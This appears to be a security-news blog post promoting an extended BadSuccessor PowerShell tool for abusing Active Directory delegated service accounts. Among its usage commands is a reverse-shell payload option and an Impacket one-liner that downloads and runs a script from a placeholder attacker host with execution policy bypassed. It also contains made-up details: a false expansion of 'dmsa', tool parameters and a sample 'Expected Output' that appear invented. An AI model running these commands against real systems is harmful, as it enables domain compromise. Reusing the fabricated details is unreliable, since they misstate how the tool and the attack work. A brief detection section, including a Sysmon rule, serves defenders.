PowerShell Tool for Offensive Security: BadSuccessor Extended

Listen to this Post

Featured Image
Daniel Scheidt, an Offensive Security professional at Vorwerk/Cerberus-Security, has extended Logan G.’s work on BadSuccessor, a PowerShell-based tool designed for offensive security operations. The tool is now fully native to PowerShell and works regardless of whether the system is domain-joined or not. It can assess both computers and users, check Domain Controllers (DCs), inspect Access Control Lists (ACLs), and even generate weaponized dmsa (Delegated Microsoft Security Assessments).

🔗 Tool Link: https://lnkd.in/e77aR3wG

You Should Know:

Key Features of the Extended BadSuccessor Tool

  • Native PowerShell Implementation – No external dependencies, making it stealthier.
  • Domain-Independent – Works on both domain-joined and non-domain systems.
  • DC & ACL Analysis – Helps identify misconfigurations in Active Directory.
  • Weaponized dmsa Creation – Generates attack-ready delegation abuse payloads.
  • GridView Support – Provides an organized, interactive output.

Practical Commands & Usage

Here’s how you can leverage this tool in offensive security operations:

1. Basic Execution

Import-Module .\BadSuccessor.ps1 
Invoke-BadSuccessor -CheckDCs -CheckACLs 

2. Exporting ACL Data for Analysis

Invoke-BadSuccessor -ExportACLs -OutputFile "ACL_Report.csv" 

3. Generating Weaponized dmsa

Invoke-BadSuccessor -GenerateDMSA -Payload "ReverseShell" -OutputFile "malicious_dmsa.xml" 

4. Checking Domain Controllers for Vulnerabilities

Invoke-BadSuccessor -CheckDCs -Verbose 

5. Interactive GridView for ACL Review

Invoke-BadSuccessor -CheckACLs -ShowGridView 

Linux Equivalent (For Cross-Platform Security Testing)

If you’re testing from a Linux system, use evil-winrm or Impacket to interact with Windows environments:

evil-winrm -i <TARGET_IP> -u <USER> -p <PASSWORD> -s /path/to/BadSuccessor.ps1 

Or with Impacket:

python3 smbexec.py DOMAIN/USER:PASSWORD@TARGET_IP -c "powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/BadSuccessor.ps1')\"" 

Mitigation & Detection

Defenders should monitor for:

  • Unusual PowerShell execution with -ep bypass or -nop flags.
  • Suspicious ACL modifications in Active Directory.
  • Unexpected dmsa file generation.

Use Microsoft Defender for Identity or Sysmon to detect such activities:

<RuleGroup name="" groupRelation="or"> 
<ProcessCreate onmatch="include"> 
<CommandLine condition="contains">-ep bypass</CommandLine> 
</ProcessCreate> 
</RuleGroup> 

What Undercode Say

This tool exemplifies the evolving offensive security landscape, where PowerShell remains a dominant force in both red and blue team operations. The ability to bypass domain restrictions and automate attack payloads makes BadSuccessor a potent weapon. Security teams must enhance monitoring for PowerShell-based attacks, enforce constrained language mode, and regularly audit ACLs and delegation rights in Active Directory.

Expected Output:

[+] DC Analysis Complete. 
[+] Vulnerable ACLs Identified: 5 
[+] Weaponized dmsa Generated: malicious_dmsa.xml 
[+] GridView Displayed for ACL Review. 

Prediction

As offensive tooling evolves, expect more PowerShell-native attack frameworks that bypass traditional detection mechanisms. AI-driven security tools will likely emerge to counter such threats, but attackers will adapt by leveraging living-off-the-land binaries (LOLBins) more aggressively.

🔗 Relevant URLs:

References:

Reported By: Daniel Scheidt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram